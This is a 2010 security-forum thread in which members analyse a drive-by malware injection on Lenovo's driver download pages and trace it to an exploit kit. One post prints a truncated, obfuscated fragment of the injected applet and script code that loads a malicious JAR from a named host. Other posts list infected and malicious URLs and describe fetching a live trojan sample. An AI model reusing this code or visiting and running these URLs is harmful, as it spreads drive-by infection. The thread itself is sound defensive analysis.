Malware (Trojan) found in download portal of Lenovo.

Discussion in 'other security issues & news' started by Ocky, Jun 20, 2010.

Thread Status:
Not open for further replies.
  1. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
    Don't use Lenovo Thinkpads, but came across this through a German site.
    Apparently it's a Java based trojan downloader and seems to be using (hiding in) an IFrame left by the attacker.
    Found this from German Forum... http://www.thinkpad-forum.de/softwa...janer-alarm-in-der-lenovo-edge-treibermatrix/ (German)
    Some of the known download sites affected:-

    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-61596.html (R51e)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-67100.html (X41 Tablet)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-68184.html (Reserve Edition)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-46024.html (R40, R40e)

    PS. It appears that Firefox and Chrome warn visitors to the website in question.
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes, it's a well-crafted attack.

    Often, the i-frame or script code injection is not the fault of the web site itself, rather, the web hosting server where the vulnerability lies, giving the hacker root access whereby the malicious code can be injected into all of the HTML pages, as shown in your example.

    Using IE to watch the pages load, we see the malicious domain being loaded by the I-frame you post:

    i-frame_1.gif

    That domain has been taken down, so we can't see how the actual exploit works. Most malicious sites these days have an exploit pack, a group of exploits looking for a vulnerability in the user's system when redirected to the malicious website.


    ----
    rich
     
  3. Mornsgrans

    Mornsgrans Registered Member

    Joined:
    Jun 21, 2010
    Posts:
    1
    That domain seems to be up again as i read a few minutes ago in annother forum it but not tested by myself.
     
  4. Bugbatter

    Bugbatter Security Expert

    Joined:
    Jun 2, 2004
    Posts:
    14
    Location:
    USA
    According to source at Lenovo, the malware issue impacts html files hosted on download.lenovo.com. Searching for general (drivers EXE, PDF, warranty status, IWS, system service parts, etc.) at lenovo.com domain remains unaffected.
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Thanks - indeed it is back up, but Lenovo has cleaned up its HTML pages on its Download site. However, we can test the link directly, and at least one of the exploits uses a Java applet, as that forum mentioned:

    volgo_1.gif

    This exploit uses "evasive" techniques, so that if an attempt is made to connect another time, the Google Search Page appears:

    volgo_2.gif

    Finjan wrote about this several years ago:

    Evasive Attacks Cover Their Tracks to Avoid Detection
    http://www.finjan.com/Pressrelease.aspx?id=1527&PressLan=1230&lan=3
    If you are testing using a dynamic IP address, disconnecting/reconnecting allows loading the site again.

    The code is definitely obfuscated (disguised). You can see that it downloads a .JAR (java) file, but the script itself cannot be understood without sophisticated de-obfuscation analysis:

    Code:
    <body><applet code='dev.s.Saxonia' [B][COLOR="DarkRed"]archive='tmp/des.jar'[/COLOR][/B]
    
    VALUE='[B][COLOR="DarkRed"]http://volgo - marun . cn /......?[/COLOR][/B]
    
    <[B][COLOR="DarkRed"]script[/COLOR][/B]>var joetf6="d.<i'<ih``=A2F40Joa;=%55%58%43%71%84%35%
    0e%ee%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08
    %05%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08%
    70%60%ca%3c%b1%81%8c%08%08%08%a0%53%00%ff%ee%20%ac
    %00%00%00%00%10%ff%83%55%44%76%46%67%06%67s+
    %22%66%27%67%9rk6%76%77%66%36%f`vd.lo;t'prc,B-D09r`at2Pa.bhl'r
    Cjoatp.Epoc.';)(tpy`.eae.;e).e;e)hFnO(ibd'=de<aiel'm`lp''aab'snieScm'aiofi5t
    <<>i(celIn`dnei&Lexs=r`osej+ttnbo+id6185'sbeu}'}nPa`gpdi'`:nd'.mat
    (a'06F235EF66e4FE5EF8DD3re500004FB0312A4D67899846EA284399504FF35
    F7188A20916892994CFFBD608034741047C2374238C8CD5E001086AA803CE7
    yman'doard.h)ri+euw}eosuI)=tE'gri;tplognfrbdo'Pypetcettlowbv>Odewcc88-
    I could not get the exploit to run using Opera, even with Java enabled.


    ----
    rich
     
  6. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Very surprised Lenovo got hit, i expect the chinese to be on the ball. Just shows :D

    Tried several times yesterday with FF and IE but saw nothing but a blank page and no nasty. Today though

    vol.gif

    still no nasty etc i could find.

    Wonder how many people got infected, probably not that many ? but still not good.
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    You won't find the exploit by going to the domain - the cybercriminals use the domain to point directly to the exploit file.

    If you are set up to test, you can use the direct URL shown in the i-frame in the screenshot in the first post.

    ----
    rich
     
  8. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Hi, couldn't see/find anything on there last time, even in the source ? However when i added /pek/index.php onto the www i got all this on the page

    v1.gif

    Allowed Scripting and the Java etc box dissapeared :p Don't have/want/ Java though. Refreshed the page and i got a redirect attempt to Google. Tried various attempts to go back, with/without Scripting/iframe, but just got time outs after about 1-2 minutes. Even using proxies with both www's resulted in the same outcome. Maybe they actively monitor their www for repeated polling etc, and then block ?

    If i had managed to grab something i would have passed it on to vendors and VT etc, as i wasn't planning on running it :D
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    That URL is no longer loading the Java Applet. Search for
    Code:
    dev.s.Saxonia
    and you will see that it is part of the exploit -- it's been around for a month or so in various guises and redirection exploits.

    See my comments in Post #5 about evasive techniques.

    ----
    rich
     
  10. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Got the source page this time ;) and sure enough just like you said dev.s.Saxonia is there. Also saw tmp/des.jar

    dev.gif

    Inputted into the very useful http://jsunpack.jeek.org/dec/go and got

    js.gif

    DL'd the Zip

    av.gif

    As you say

    Also noticed in there

    reg.gif

    Thought you might be interested in the PDF exploits and Drivebys from there

    nort.gif

    Viruses Threats found: 8

    Drive-By Downloads Threats found: 6

    http://safeweb.norton.com/report/show?name=registr3red.com


    Quite right Sir, good thing i'm not one of your students, otherwise detention for me :D I could think of a lot worse places for it though than sunny CA :) Lucky you :p
     
  11. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    This is a great tool for analysis. Thanks for posting.

    As you (and Ocky) discovered, the exploit uses an Exploit Pack, or Kit, which is very popular these days, as I mentioned in Post #2 above. The Kit comes with pre-packaged exploits targeting common vulnerabilities, both patched and non-patched. The list of exploits will change, as new vulnerabilites in applications are discovered, PDF being quite useful these days!

    The cybercriminal purchases the Kit and sets up a web site (volgo-marun and registr3red in this case). The cybercriminals will have the exploit download the malware executable of their choice. Then, it's just a matter of using web tools to search around for vulnerable web servers in order to inject a malicious i-frame or script (SQL injection being very popular) that redirects the victim to the malicious web site that hosts the exploit kit.

    You may remember we discussed exploit kits in the Blade-Defender thread. For those who missed that, I posted a summary/description of some of the kits:

    https://www.wilderssecurity.com/showthread.php?p=1630504#post1630504

    As I pointed out, these types of attacks are really easy to prevent, since all of the exploits have one goal in mind: download a trojan executable. There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

    ----
    rich
     
  13. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
    Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.
     
  14. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Glad you like it, and hope it proves very useful to you from now on :) I only discovered it by accident yesterday :D as i was searching for info etc on registr3red.com etc

    They are still at it today with more live nasties,

    vol.gif

    I DL'd 2 from slightly different www's

    exeup.gif

    exe.exe = update.exe = Trojan Bredolab

    Only 2 shows on VT for both = same nasty, different name.

    PEXK open and waiting :(

    pex.gif

    Yes indeed, and definately worth checking out for those that havn't :thumb: Still no sign of Blade-Defender as of yet :( Maybe it's a case of " all good things come to those that wait " ;)

    Yep, word up

    @Ocky

    You're very welcome :) but Rmus is the expert, not me :( I just tinker here and there and do whatever i can ;)

    Thanks for the Update: :thumb: Confirmed above.
     
  15. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    So, pek in the URL stands for Phoenix Exploit Kit? Very interesting!

    You are welcome, and yes, he has done some deep digging here!

    ----
    rich
     
Loading...
Thread Status:
Not open for further replies.